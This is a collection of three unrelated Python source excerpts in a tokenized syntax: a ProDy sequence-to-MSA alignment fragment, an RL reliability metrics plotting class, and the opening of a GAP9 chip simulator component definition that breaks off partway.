Sequence)<block_start>label=seq.getLabel()<block_end><else_stmt><block_start><raise>ValueError('A label cannot be extracted from seq so please provide one.')<block_end><block_end>index=msa.getIndex(label)<if_stmt>index<is><none><and>(len(label)<eq>4<or>len(label)<eq>5)<block_start><import_from_stmt>prody parsePDB<try_stmt><block_start>structure,header=parsePDB(label[:4] header=<true>)<block_end><except_stmt>Exception<as>err<block_start><raise>IOError('failed to parse header for {0} ({1})'.format(label[:4] str(err)))<block_end>chid=chain<for_stmt>poly header['polymers']<block_start><if_stmt>chid<and>poly.chid<ne>chid<block_start><continue><block_end><for_stmt>dbref poly.dbrefs<block_start><if_stmt>index<is><none><block_start>index=msa.getIndex(dbref.idcode)<if_stmt>index<is><not><none><block_start>LOGGER.info('{0} idcode {1} for {2}{3} '<concat>'is found in {4}.'.format(dbref.database dbref.idcode label[:4] poly.chid str(msa)))<line_sep>label=dbref.idcode<line_sep><break><block_end><block_end><if_stmt>index<is><none><block_start>index=msa.getIndex(dbref.accession)<if_stmt>index<is><not><none><block_start>LOGGER.info('{0} accession {1} for {2}{3} '<concat>'is found in {4}.'.format(dbref.database dbref.accession label[:4] poly.chid str(msa)))<line_sep>label=dbref.accession<line_sep><break><block_end><block_end><block_end><block_end><if_stmt>index<is><not><none><block_start>chain=structure[poly.chid]<block_end><block_end><if_stmt>index<is><none><block_start><raise>ValueError('label is not in msa, or msa is not indexed')<block_end><try_stmt><block_start>len(index)<block_end><except_stmt>TypeError<block_start><pass><block_end><else_stmt><block_start><raise>ValueError('label {0} maps onto multiple sequences, '<concat>'so cannot be used for refinement'.format(label))<block_end><if_stmt>isinstance(index int)<block_start>refMsaSeq=str(msa[index]).upper().replace('-' '.')<block_end><else_stmt><block_start><raise>TypeError('The output from querying that label against msa is not a single 
sequence.')<block_end><if_stmt>method<eq>'local'<block_start>alignment=pairwise2.align.localms(sequence str(refMsaSeq) match mismatch gap_opening gap_extension one_alignment_only=1)<block_end><elif_stmt>method<eq>'global'<block_start>alignment=pairwise2.align.globalms(sequence str(refMsaSeq) match mismatch gap_opening gap_extension one_alignment_only=1)<block_end><else_stmt><block_start><raise>ValueError('method should be local or global')<block_end>seq_indices=[0]<line_sep>msa_indices=[0]<for_stmt>i range(len(alignment[0][0]))<block_start><if_stmt>alignment[0][0][i]<ne>'-'<block_start>seq_indices.append(seq_indices[i]+1)<block_end><else_stmt><block_start>seq_indices.append(seq_indices[i])<block_end><if_stmt>alignment[0][1][i]<ne>'-'<block_start>msa_indices.append(msa_indices[i]+1)<block_end><else_stmt><block_start>msa_indices.append(msa_indices[i])<block_end><block_end>seq_indices.pop(0)# The first element was extra for initialisation
msa_indices.pop(0)# The first element was extra for initialisation
seq_indices=array(seq_indices)<line_sep>msa_indices=array(msa_indices)<if_stmt>ag<block_start>seq_indices<augadd>ag.getResnums()[0]-1<block_end>alignment=MSA(msa=array([array(list(alignment[0][0])) array(list(alignment[0][1]))]) labels=[ag.getTitle() label])<line_sep><return>alignment seq_indices msa_indices<block_end><def_stmt>alignTwoSequencesWithBiopython seq1 seq2 **kwargs<block_start>"""Easily align two sequences with Biopython's globalms or localms.
Returns an MSA and indices for use with :func:`.showAlignment`.
Alignment parameters can be provided as keyword arguments.
Default values are as originally set in the proteins.compare
module, but now found in utilities.seqtools.
:arg match: a positive integer, used to reward finding a match
:type match: int
:arg mismatch: a negative integer, used to penalise finding a mismatch
:type mismatch: int
:arg gap_opening: a negative integer, used to penalise opening a gap
:type gap_opening: int
:arg gap_extension: a negative integer, used to penalise extending a gap
:type gap_extension: int
:arg method: method for pairwise2 alignment.
Possible values are 'local' and 'global'
:type method: str
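A minimal usage sketch (toy sequences; Biopython must be installed)::
aln, seq_indices, msa_indices = alignTwoSequencesWithBiopython('MKTAYIAKQR', 'MKTAYLAKQK', method='global')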
"""<line_sep>match=kwargs.get('match' MATCH_SCORE)<line_sep>mismatch=kwargs.get('mismatch' MISMATCH_SCORE)<line_sep>gap_opening=kwargs.get('gap_opening' GAP_PENALTY)<line_sep>gap_extension=kwargs.get('gap_extension' GAP_EXT_PENALTY)<line_sep>method=kwargs.get('method' ALIGNMENT_METHOD)<if_stmt>method<eq>'local'<block_start>alignment=pairwise2.align.localms(seq1 seq2 match mismatch gap_opening gap_extension)<block_end><elif_stmt>method<eq>'global'<block_start>alignment=pairwise2.align.globalms(seq1 seq2 match mismatch gap_opening gap_extension)<block_end><else_stmt><block_start><raise>ValueError('method should be local or global')<block_end>seq_indices=[0]<line_sep>msa_indices=[0]<for_stmt>i range(len(alignment[0][0]))<block_start><if_stmt>alignment[0][0][i]<ne>'-'<block_start>seq_indices.append(seq_indices[i]+1)<block_end><else_stmt><block_start>seq_indices.append(seq_indices[i])<block_end><if_stmt>alignment[0][1][i]<ne>'-'<block_start>msa_indices.append(msa_indices[i]+1)<block_end><else_stmt><block_start>msa_indices.append(msa_indices[i])<block_end><block_end>seq_indices=array(seq_indices)<line_sep>msa_indices=array(msa_indices)<line_sep>alignment=MSA(msa=array([array(list(alignment[0][0])) array(list(alignment[0][1]))]))<line_sep><return>alignment seq_indices msa_indices<block_end><def_stmt>trimAtomsUsingMSA atoms msa **kwargs<block_start>"""This function uses :func:`.alignSequenceToMSA` and has the same kwargs.
:arg atoms: an atomic structure for trimming
:type atoms: :class:`.Atomic`
:arg msa: a multiple sequence alignment
:type msa: :class:`.MSA`
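A minimal usage sketch (the PDB identifier and MSA file name are placeholders)::
from prody import parsePDB, parseMSA
atoms = parsePDB('1xxx')
msa = parseMSA('family.slx')
trimmed = trimAtomsUsingMSA(atoms, msa, label='1xxx', chain='A')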
"""<line_sep>aln,idx_1,idx_2=alignSequenceToMSA(atoms msa **kwargs)<line_sep>u,i=unique(idx_2 return_index=<true>)<line_sep>resnums_str=' '.join([str(x)<for>x idx_1[i]])<line_sep>chain=kwargs.get('chain' 'A')<line_sep><return>atoms.select('chain {0} and resnum {1}'.format(chain resnums_str))<block_end>
|
# coding=utf-8
# Copyright 2019 The Authors of RL Reliability Metrics.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Class for making plots of robustness metric results and statistics."""<import_stmt>datetime<import_stmt>math<import_stmt>os<import_from_stmt>absl logging<import_from_stmt>matplotlib pyplot<as>plt<import_stmt>numpy<as>np<import_from_stmt>rl_reliability_metrics.analysis io_utils_oss<as>io_utils<import_from_stmt>rl_reliability_metrics.analysis plot_utils<import_from_stmt>rl_reliability_metrics.analysis stats<import_from_stmt>rl_reliability_metrics.analysis stats_utils<line_sep># Internal gfile dependencies
HATCH_PATTERNS=('-' '/' '.' 'O' '+' 'o' 'x' '*' '\\')<line_sep>ALGO_COLORS=('r' 'y' 'g' 'b' 'm')<line_sep>MARKERS=('o' 's' 'v' '^' '<' '>')<line_sep>TIMEFRAME_NAMES=['Beginning' 'Middle' 'End']<line_sep>UP_ARROW=r' $\uparrow$'<line_sep>DOWN_ARROW=r' $\downarrow$'<class_stmt>Plotter(object)<block_start>"""Class for making plots of metric results and statistics."""<def_stmt>__init__ self data pvals_dir confidence_intervals_dir n_timeframes algorithms=<none> out_dir=<none> pthresh=0.01 multiple_comparisons_method='benjamini-yekutieli' subplot_axis_labels=<true> make_legend=<false><block_start>"""Initialize Plotter object.
Args:
data: DataDef object containing all the metric results.
pvals_dir: Path to directory containing p-values for comparisons between
pairs of algorithms.
confidence_intervals_dir: Path to directory containing bootstrap
confidence intervals.
n_timeframes: Total number of timeframes we are dividing each run into.
algorithms: If specified, these algorithms will be plotted, in this order.
If None, we plot all algorithms available in the data (order not
guaranteed).
out_dir: Path to directory where we save the plot images. If None, we
simply display the images without saving.
pthresh: p-value threshold for significance.
multiple_comparisons_method: String indicating method to use for multiple
comparisons correction. See stats_utils.multiple_comparisons_correction for
options.
subplot_axis_labels: Whether to add x- and y-axis labels for each subplot.
make_legend: Whether to make a legend.
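Example (paths, metric name and the DataDef construction are illustrative only):
plotter = Plotter(data=data_def, pvals_dir='/tmp/pvals',
confidence_intervals_dir='/tmp/cis', n_timeframes=3)
plotter.make_plots(metric='IqrWithinRuns')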
"""<line_sep>self.data_def=data<line_sep>self.pvals_dir=pvals_dir<line_sep>self.confidence_intervals_dir=confidence_intervals_dir<line_sep>self.n_timeframes=n_timeframes<line_sep>self.out_dir=out_dir<line_sep>self.pthresh=pthresh<line_sep>self.multiple_comparisons_method=multiple_comparisons_method<line_sep>self.subplot_axis_labels=subplot_axis_labels<line_sep>self.make_legend=make_legend<line_sep># Parse information from data_def
self.dataset=self.data_def.dataset<line_sep>self.algorithms=algorithms<if>algorithms<else>self.data_def.algorithms<line_sep>self.n_algo=len(self.algorithms)<line_sep>self.n_task=len(self.data_def.tasks)<line_sep># Multiple-comparisons-corrected p-value threshold
self.pthresh_corrected=stats_utils.multiple_comparisons_correction(self.n_algo self.pthresh self.multiple_comparisons_method)<block_end><def_stmt>make_plots self metric<block_start>"""Make all plots for a given metric.
Args:
metric: String name of the metric.
"""<line_sep>plot_utils.paper_figure_configs()<line_sep># Create a metric-specific StatsRunner object
stats_runner=stats.StatsRunner(self.data_def metric self.n_timeframes)<line_sep>result_dims=stats_runner.result_dims<if_stmt>result_dims<eq>'ATRP'# Within-runs metric with eval points.
<block_start>self._make_plots_with_eval_points(metric stats_runner)<block_end><elif_stmt>result_dims<eq>'ATR'# Within-runs metrics without eval points (one value per run).
<block_start>self._make_plots_no_eval_points(metric stats_runner)<block_end><elif_stmt>result_dims<eq>'ATP'# Across-runs metric with eval points
<block_start>self._make_plots_with_eval_points(metric stats_runner)<block_end><else_stmt><block_start><raise>ValueError('plotting not implemented for result_dims: %s'%result_dims)<block_end><block_end><def_stmt>_save_fig self metric plot_name<block_start>timestamp=datetime.datetime.now().strftime('%Y%m%d_%H%M%S_%f')<line_sep>filepath=os.path.join(self.out_dir '%s__%s__%s.png'%(metric plot_name timestamp))<line_sep>io_utils.makedirs(os.path.dirname(filepath))<with_stmt>open(filepath 'wb')<as>f<block_start>plt.savefig(f)<block_end>logging.info('Plot output to: %s' filepath)<block_end><def_stmt>_make_plots_with_eval_points self metric stats_runner<block_start>"""Make plots for a metric evaluated at multiple evaluation points per run.
e.g. 'ATP' or 'ATRP' metrics.
Plot 1: raw metric values per task.
* One subplot per task.
* Each subplot contains a plot showing the metric values across evaluation
points. For ATRP metrics, we show the median metric values and fill plots
indicating the IQR at each evaluation point.
Plot 2: Mean rankings across tasks.
* One subplot per timeframe.
* One bar plot showing the mean ranking for each algorithm, and horizontal
line segments indicating which pairs of algorithms are statistically
different.
Args:
metric: String specifying the metric.
stats_runner: StatsRunner object
"""<line_sep># Set up figure for per-task raw values.
subplot_ncol_1=4<line_sep>n_subplots_1=self.n_task+1<if>self.make_legend<else>self.n_task<line_sep>subplot_nrow_1=math.ceil(n_subplots_1/subplot_ncol_1)<line_sep>fig1=plt.figure(figsize=(4<times>subplot_ncol_1 4<times>subplot_nrow_1))<line_sep># Set up figure for mean rankings.
subplot_ncol_2=self.n_timeframes<if_stmt>self.make_legend<block_start>subplot_ncol_2<augadd>1<block_end>subplot_nrow_2=1<line_sep>fig2=plt.figure(figsize=(4<times>subplot_ncol_2 4<times>subplot_nrow_2))<line_sep>##=== Plot 1: Raw metric values per task ===##
plt.figure(fig1.number)<line_sep>eval_point_idxs=stats_runner.get_timeframe_points(<none>)<line_sep>eval_point_values=self.data_def.metric_params[metric]['eval_points']<line_sep>metric_results=stats_runner.load_metric_results(self.algorithms eval_point_idxs collapse_on_timepoints=<false>)<line_sep>result_dims=stats_runner.result_dims<for_stmt>i_task range(self.n_task)<block_start>plt.subplot(subplot_nrow_1 subplot_ncol_1 i_task+1)<line_sep>task_results=np.squeeze(metric_results[: i_task])<if_stmt>len(eval_point_idxs)<eq>1<block_start>task_results=np.expand_dims(task_results -1)<block_end><if_stmt>result_dims<eq>'ATP'# For across-run metrics, we plot a single curve.
<block_start><for_stmt>i_algo range(self.n_algo)<block_start>plt.plot(eval_point_values task_results[i_algo :] marker=MARKERS[i_algo])<block_end><if_stmt>self.subplot_axis_labels<block_start>plt.xlabel('evaluation points' fontsize=16)<line_sep>plt.ylabel('metric values' fontsize=16)<block_end><block_end><elif_stmt>result_dims<eq>'ATRP'# For per-run metrics, we plot the median and IQR across curves.
<block_start><for_stmt>i_algo range(self.n_algo)<block_start>algo_color=ALGO_COLORS[i_algo]<line_sep>task_algo_results=task_results[i_algo]# n_runs x n_eval_points
result_medians=np.median(task_algo_results axis=0)<line_sep>result_quartile1=np.percentile(task_algo_results q=25 axis=0)<line_sep>result_quartile3=np.percentile(task_algo_results q=75 axis=0)<line_sep>plt.plot(eval_point_values result_medians algo_color marker=MARKERS[i_algo])<line_sep>plt.fill_between(eval_point_values result_quartile1 result_quartile3 alpha=0.3 color=algo_color)<block_end><if_stmt>self.subplot_axis_labels<block_start>plt.xlabel('evaluation points' fontsize=16)<line_sep>plt.ylabel('metric values' fontsize=16)<block_end><block_end><else_stmt><block_start><raise>ValueError('result_dims must be ATP or ATRP, not %s'%result_dims)<block_end>plot_utils.simple_axis(plt.gca())<line_sep>plt.title(self.data_def.tasks[i_task])<block_end># plot the legend
<if_stmt>self.make_legend<block_start>plt.subplot(subplot_nrow_1 subplot_ncol_1 n_subplots_1)<line_sep>self._lineplot_legend()<block_end>##=== Plot 2: Mean rankings (mean across tasks) ===##
<for_stmt>timeframe range(self.n_timeframes)# Load data for plotting.
<block_start>timeframe_points=stats_runner.get_timeframe_points(timeframe)<line_sep>pvals=self._load_pvals(metric timeframe)<line_sep>confidence_intervals=self._load_confidence_intervals(metric stats_runner timeframe)<line_sep>plt.figure(fig2.number)<line_sep>metric_results=stats_runner.load_metric_results(self.algorithms timeframe_points collapse_on_timepoints=<true>)<line_sep>plt.subplot(subplot_nrow_2 subplot_ncol_2 timeframe+1)<line_sep>self._plot_bars_and_significant_differences(metric_results pvals confidence_intervals stats_runner)<line_sep>plt.title(TIMEFRAME_NAMES[timeframe] fontsize=14)<block_end># plot the legend
<if_stmt>self.make_legend<block_start>plt.subplot(subplot_nrow_2 subplot_ncol_2 subplot_ncol_2)<line_sep>self._barplot_legend()<block_end>##=== Wrap up the figures ===##
<for_stmt>fig,plot_name [(fig1 'per-task_raw') (fig2 'mean_rankings')]<block_start><if_stmt>plot_name<eq>'per-task_raw'<block_start>suptitle_suffix=(UP_ARROW<if>stats_runner.bigger_is_better<else>DOWN_ARROW)<block_end><else_stmt><block_start>suptitle_suffix=''<block_end>plt.figure(fig.number)<line_sep>self._wrap_up_figure(metric plot_name suptitle_suffix)<block_end><block_end><def_stmt>_make_plots_no_eval_points self metric stats_runner<block_start>"""Make plots for a metric without evaluation points (one value per run).
e.g. 'ATR' metrics.
Plot 1: Raw metric values per task.
* One subplot per task.
* Each subplot contains a box-and-whisker plot showing the median metric
values for each algorithm, a box indicating 1st and 3rd quartiles, and
whiskers indicating the minimum and maximum values (excluding outliers,
defined as being outside 1.5x the inter-quartile range from the 1st and 3rd
quartiles).
Plot 2: Mean rankings across tasks.
* One bar plot showing the mean ranking for each algorithm, and horizontal
line segments indicating which pairs of algorithms are statistically
different.
Args:
metric: String specifying the metric.
stats_runner: StatsRunner object
"""<line_sep># Load data for plotting.
metric_results=stats_runner.load_metric_results(self.algorithms timeframe_points=<none>)<line_sep>pvals=self._load_pvals(metric)<line_sep>confidence_intervals=self._load_confidence_intervals(metric stats_runner)<line_sep>##=== Plot 1: Raw metric values per task ===##
# Set up figure.
subplot_ncol=4<line_sep>n_subplot=self.n_task<if_stmt>self.make_legend<block_start>n_subplot<augadd>1<block_end>subplot_nrow=math.ceil(n_subplot/subplot_ncol)<line_sep>plt.figure(figsize=(4<times>subplot_ncol 4<times>subplot_nrow))<line_sep># Plot the raw metric values as box-and-whisker plots.
<for_stmt>i_task range(self.n_task)<block_start>plt.subplot(subplot_nrow subplot_ncol i_task+1)<line_sep>task_results=np.squeeze(metric_results[: i_task :])<line_sep>boxplot=plt.boxplot(task_results.T patch_artist=<true>)<for_stmt>part ['boxes' 'whiskers' 'fliers' 'means' 'medians' 'caps']<block_start>plt.setp(boxplot[part] color='k')<block_end><for_stmt>i_patch,patch enumerate(boxplot['boxes'])<block_start>patch.set(facecolor=ALGO_COLORS[i_patch])<block_end>plt.title(self.data_def.tasks[i_task] fontsize=16)<line_sep>self._configure_axes('Raw metric values')<line_sep>self._extend_ylims_past_zero(task_results)<line_sep>plot_utils.simple_axis(plt.gca())<block_end><if_stmt>self.make_legend<block_start>plt.subplot(subplot_nrow subplot_ncol n_subplot)<line_sep>self._barplot_legend()<block_end># Wrap up the figure.
suptitle_suffix=(UP_ARROW<if>stats_runner.bigger_is_better<else>DOWN_ARROW)<line_sep>self._wrap_up_figure(metric plot_name='per-task_raw' suptitle_suffix=suptitle_suffix)<line_sep>##=== Plot 2: Mean rankings (mean across tasks) ===##
# Set up figure.
subplot_ncol=2<if>self.make_legend<else>1<line_sep>subplot_nrow=1<line_sep>plt.figure(figsize=(4<times>subplot_ncol 4<times>subplot_nrow))<line_sep># Plot mean rankings and show statistical differences
plt.subplot(subplot_nrow subplot_ncol 1)<line_sep>self._plot_bars_and_significant_differences(metric_results pvals confidence_intervals stats_runner)<line_sep>plot_utils.simple_axis(plt.gca())<line_sep># plot the legend
<if_stmt>self.make_legend<block_start>plt.subplot(subplot_nrow subplot_ncol subplot_ncol)<line_sep>self._barplot_legend()<block_end># Wrap up the figure.
self._wrap_up_figure(metric plot_name='mean_rankings')<block_end><def_stmt>_wrap_up_figure self metric plot_name suptitle_suffix=''<block_start>"""Add suptitle, set tight layout, and save the figure."""<line_sep>plt.suptitle(plot_utils.METRICS_DISPLAY_NAMES[metric]+suptitle_suffix fontsize=14)<line_sep>plt.tight_layout(rect=[0 0.03 1 0.95])<if_stmt>self.out_dir<block_start>self._save_fig(metric plot_name)<block_end><block_end><def_stmt>_load_pvals self metric timeframe=<none><block_start>"""Load previously computed p-values.
Args:
metric: Which metric we are plotting.
timeframe: Which timeframe we are plotting. Set None if irrelevant (for
metrics that are not evaluated at specific eval points).
Returns:
Dictionary of p-values, with entries {'algo1.algo2': pval}
"""<line_sep>pvals={}<for_stmt>algo1 self.algorithms<block_start><for_stmt>algo2 self.algorithms# Get path to p-value
<block_start>pvals_filepath=('%s/%s_%s_%s'%(self.pvals_dir metric algo1 algo2))<if_stmt>timeframe<is><not><none><block_start>pvals_filepath<augadd>'_%d'%timeframe<block_end># Load the p-value
<with_stmt>open(pvals_filepath 'r')<as>f<block_start>pval=float(f.readline())<block_end>pvals['%s.%s'%(algo1 algo2)]=pval<block_end><block_end>logging.info('P-values loaded:')<line_sep>logging.info(pvals)<line_sep><return>pvals<block_end><def_stmt>_load_confidence_intervals self metric stats_runner timeframe=<none><block_start>"""Load previously computed confidence intervals.
Args:
metric: Which metric we are plotting.
stats_runner: StatsRunner object
timeframe: Which timeframe we are plotting. Set None if irrelevant (for
metrics that are not evaluated at specific eval points).
Returns:
Dictionary of confidence intervals, with entries
{'algo': [ci_lower, ci_upper]}
"""<line_sep>cis={}<for_stmt>algo self.algorithms# Get path to confidence intervals
<block_start>ci_filepath='%s/%s_%s'%(self.confidence_intervals_dir metric algo)<if_stmt>timeframe<is><not><none><block_start>ci_filepath<augadd>'_%d'%timeframe<block_end># Load the confidence interval
<with_stmt>open(ci_filepath 'r')<as>f<block_start>line=f.readline()<block_end>ci=list(map(float line.split(',')))<line_sep># Normalize to range (1, n_algorithms)
<if_stmt>'R'<in>stats_runner.result_dims<block_start>ci[0]<augdiv>self.data_def.n_runs_per_experiment<line_sep>ci[1]<augdiv>self.data_def.n_runs_per_experiment<block_end>cis[algo]=ci<block_end>logging.info('Confidence intervals loaded:')<line_sep>logging.info(cis)<line_sep><return>cis<block_end><def_stmt>_plot_bars_and_significant_differences self metric_results pvals confidence_intervals stats_runner<block_start>"""For a single timeframe, plot mean rank and show significant differences.
Args:
metric_results: Numpy array with metric values. First two dimensions
should be (n_algorithm, n_task)
pvals: p-values on comparison between each pair of algorithms. A dict with
entries {'algo1.algo2': pvalue}.
confidence_intervals: Confidence intervals on mean rank for each
algorithm. A dict with entries {'algo': [ci_lower, ci_upper]}.
stats_runner: StatsRunner object
"""<line_sep>ymax=1.32<times>(len(self.algorithms))<line_sep>y_pval_lines=0.83<line_sep># First get the rankings across all algos
metric_ranks=stats_runner.rank_per_task(metric_results)<line_sep># Get mean ranks over tasks, for each algo
# (collapse across all other dimensions)
extra_dims=range(1 len(metric_ranks.shape))<line_sep>mean_ranks=np.mean(metric_ranks tuple(extra_dims))<line_sep># Normalize the ranks to range (1, n_algorithms)
<if_stmt>'R'<in>stats_runner.result_dims<block_start>mean_ranks<augdiv>self.data_def.n_runs_per_experiment<block_end># Plot the mean rankings and error bars for each algo
<for_stmt>i_algo,algo enumerate(self.algorithms)<block_start>plot_utils.flipped_errorbar(x=i_algo y=mean_ranks[i_algo] yerr=confidence_intervals[algo] ymax=self.n_algo bar_color=ALGO_COLORS[i_algo] hatch_pattern=HATCH_PATTERNS[i_algo] x_offset=0.6 )<block_end># Rank order the p-values.
<if_stmt>self.multiple_comparisons_method<ne>'bonferroni'# Get subset of the p-values: we don't need the reverse comparisons, and
# we don't need the self comparisons.
<block_start>pvals_subset={}<for_stmt>i_algo,algo1 enumerate(self.algorithms)<block_start><for_stmt>j_algo range(i_algo+1 self.n_algo)<block_start>algo2=self.algorithms[j_algo]<line_sep>algo_str='%s.%s'%(algo1 algo2)<line_sep>pvals_subset[algo_str]=pvals[algo_str]<block_end><block_end>sorted_keys=sorted(pvals_subset key=pvals_subset.get)<line_sep>pval_ranks={key:rank<for>rank,key enumerate(sorted_keys)}<block_end># Plot black bars indicating significant differences.
n_lines_plotted=0<for_stmt>i_algo,algo1 enumerate(self.algorithms)<block_start><for_stmt>j_algo range(i_algo+1 self.n_algo)<block_start>algo2=self.algorithms[j_algo]<line_sep>algo_pair_str='%s.%s'%(algo1 algo2)<if_stmt>self.multiple_comparisons_method<ne>'bonferroni'<block_start>pval_rank=pval_ranks[algo_pair_str]<line_sep>pthresh_corrected=self.pthresh_corrected[pval_rank]<block_end><else_stmt><block_start>pthresh_corrected=self.pthresh_corrected<block_end><if_stmt>pvals[algo_pair_str]<l>pthresh_corrected<block_start>x=[i_algo+1 j_algo+1]<line_sep>y=[(y_pval_lines+n_lines_plotted<times>0.03)<times>ymax]<times>2<line_sep>plt.plot(x y color='k')<line_sep>n_lines_plotted<augadd>1<block_end><block_end><block_end>self._configure_axes('normalized mean rank' range(1 self.n_algo+1) range(self.n_algo 0 -1))<block_end><def_stmt>_configure_axes self y_label y_ticks=<none> y_tick_labels=<none><block_start>"""Configure axis limits and labels."""<line_sep>algo_abbreviations=[plot_utils.ALGO_ABBREVIATIONS[algo]<for>algo self.algorithms]<line_sep>plt.xticks(range(1 self.n_algo+1) algo_abbreviations)<line_sep>plt.xlim(0 len(self.algorithms)+1)<if_stmt>y_ticks<block_start>plt.yticks(y_ticks)<block_end><if_stmt>y_tick_labels<block_start>plt.gca().set_yticklabels(y_tick_labels)<block_end><if_stmt>self.subplot_axis_labels<block_start>plt.xlabel('algorithm' fontsize=16)<line_sep>plt.ylabel(y_label fontsize=16)<block_end>plt.tick_params(top='off')<block_end>@staticmethod<def_stmt>_extend_ylims_past_zero data tolerance=0.01 extension=0.1<block_start>"""Extend y-axis to ensure that zero-values in the data are visible.
Args:
data: Data being plotted.
tolerance: Determines what values are considered too close to zero.
extension: Determines how far to extend the y-axis.
"""<line_sep>ylims_orig=plt.gca().get_ylim()<line_sep>abs_min=np.abs(np.min(data))<line_sep>abs_max=np.abs(np.max(data))<line_sep># Extend below zero.
<if_stmt>abs_min<l>tolerance<times>abs_max<block_start>ylim_lower=-ylims_orig[1]<times>extension<line_sep>plt.ylim([ylim_lower ylims_orig[1]])<block_end># Extend above zero.
<elif_stmt>abs_max<l>tolerance<times>abs_min<block_start>ylim_upper=-ylims_orig[0]<times>extension<line_sep>plt.ylim([ylims_orig[0] ylim_upper])<block_end><block_end><def_stmt>_barplot_legend self<block_start>"""Plot a legend showing the color/texture for each algorithm."""<for_stmt>ibox range(self.n_algo)<block_start>box_y=self.n_algo-ibox<line_sep>plt.scatter(0 box_y s=300 marker='s' facecolor=ALGO_COLORS[ibox] edgecolor='k' hatch=HATCH_PATTERNS[ibox] label=HATCH_PATTERNS[ibox])<line_sep>plt.text(0.008 box_y-0.15 self.algorithms[ibox] fontsize=14)<line_sep>plt.xlim(-0.01 0.05)<block_end>plot_utils.no_axis(plt.gca())<block_end><def_stmt>_lineplot_legend self<block_start>"""Plot a legend showing the color/marker for each algorithm."""<for_stmt>i_algo range(self.n_algo)<block_start>y=self.n_algo-i_algo<line_sep>color=ALGO_COLORS[i_algo]<line_sep>plt.plot([0 2] [y y] color=color)<line_sep>plt.plot(1 y marker=MARKERS[i_algo] color=color)<line_sep>plt.text(2.5 y-0.002 self.algorithms[i_algo] fontsize=14)<block_end>ax=plt.gca()<line_sep>plot_utils.no_axis(ax)<line_sep>ax.set_axis_bgcolor('white')<line_sep>plt.xlim([0 10])<line_sep>plt.ylim([0 self.n_algo+1])<block_end><block_end>
|
#
# Copyright (C) 2020 GreenWaves Technologies
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
<import_stmt>gsystree<as>st<import_from_stmt>gap.gap9.soc Soc<import_from_stmt>gap.gap9.cluster Cluster get_cluster_name<import_from_stmt>ips.clock.clock_domain Clock_domain<import_from_stmt>ips.clock.clock_generator Clock_generator<import_from_stmt>ips.pmu.pmu_v4 Pmu<import_from_stmt>ips.padframe.padframe_v1 Padframe<import_from_stmt>ips.vendors.dolphin.rtc Rtc<class_stmt>Gap9(st.Component)<block_start><def_stmt>__init__ self parent name soc_config_file='gap/gap9/soc.json' cluster_config_file='gap/gap9/cluster.json' padframe_config_file='gap/gap9/padframe.json'<block_start>super(Gap9 self).__init__(parent name)<line_sep>#
# Properties
#
soc_config_file=self.add_property('soc_config_file' soc_config_file)<line_sep>cluster_config_file=self.add_property('cluster_config_file' cluster_config_file)<line_sep>nb_cluster=self.add_property('nb_cluster' 1)<line_sep>#
# Components
#
# Padframe
padframe=Padframe(self 'padframe' config_file=padframe_config_file)<line_sep># Soc clock domain
soc_clock=Clock_domain(self 'soc_clock_domain' frequency=50000000)<line_sep># Clusters clock domains
cluster_clocks=[]<for_stmt>cid range(0 nb_cluster)<block_start>cluster_name=get_cluster_name(cid)<line_sep>cluster_clocks.append(Clock_domain(self cluster_name+'_clock' frequency=50000000))<block_end># Clusters
clusters=[]<for_stmt>cid range(0 nb_cluster)<block_start>cluster_name=get_cluster_name(cid)<line_sep>clusters.append(Cluster(self cluster_name config_file=cluster_config_file cid=cid))<block_end># Soc
soc=Soc(self 'soc' config_file=soc_config_file chip=self cluster=clusters[0])<line_sep># Fast clock
fast_clock=Clock_domain(self 'fast_clock' frequency=24576063<times>2)<line_sep>fast_clock_generator=Clock_generator(self 'fast_clock_generator' powered_on=<false> powerup_time=200000000)<line_sep># Ref clock
ref_clock=Clock_domain(self 'ref_clock' frequency=65536)<line_sep>ref_clock_generator=Clock_generator(self 'ref_clock_generator')<line_sep># PMU
pmu=Pmu(self 'pmu' config_file='gap/gap9/pmu.json')<line_sep># RTC
rtc=Rtc(self 'rtc' **soc.get_property('soc/peripherals/rtc/config'))<line_sep>#
# Bindings
#
# Padframe
self.bind(ref_clock_generator 'clock_sync' padframe 'ref_clock_pad')<line_sep>self.bind(padframe 'ref_clock' soc 'ref_clock')<for_stmt>name,group padframe.get_property('groups').items()<block_start>pad_type=group.get('type')<line_sep>nb_cs=group.get('nb_cs')<line_sep>is_master=group.get('is_master')<line_sep>is_slave=group.get('is_slave')<line_sep>is_dual=group.get('is_dual')<if_stmt>pad_type<eq>'gpio'<block_start>self.bind(padframe name+'_pad' soc name)<block_end><else_stmt><block_start><if_stmt>is_master<block_start>self.bind(soc name padframe name)<if_stmt>is_dual<block_start>self.bind(padframe name+'_in' soc name+'_in')<block_end><block_end><if_stmt>is_slave<block_start>self.bind(padframe name soc name)<if_stmt>is_dual<block_start>self.bind(soc name+'_out' padframe name+'_out')<block_end><block_end><block_end><if_stmt>nb_cs<is><not><none><block_start><for_stmt>cs range(0 nb_cs)<block_start>cs_name=name+'_cs'+str(cs)<line_sep>cs_data_name=name+'_cs'+str(cs)+'_data'<if_stmt>is_master<block_start>self.bind(padframe cs_data_name+'_pad' self cs_data_name)<line_sep>self.bind(padframe cs_name+'_pad' self cs_name)<block_end><if_stmt>is_slave<block_start>self.bind(self cs_data_name padframe cs_data_name+'_pad')<line_sep>self.bind(self cs_name padframe cs_name+'_pad')<block_end><block_end><block_end><else_stmt><block_start><if_stmt>is_master<block_start>self.bind(padframe name+'_pad' self name)<block_end><if_stmt>is_slave<block_start>self.bind(self name padframe name+'_pad')<block_end><block_end><block_end># Soc clock domain
self.bind(soc_clock 'out' soc 'clock')<line_sep># Clusters
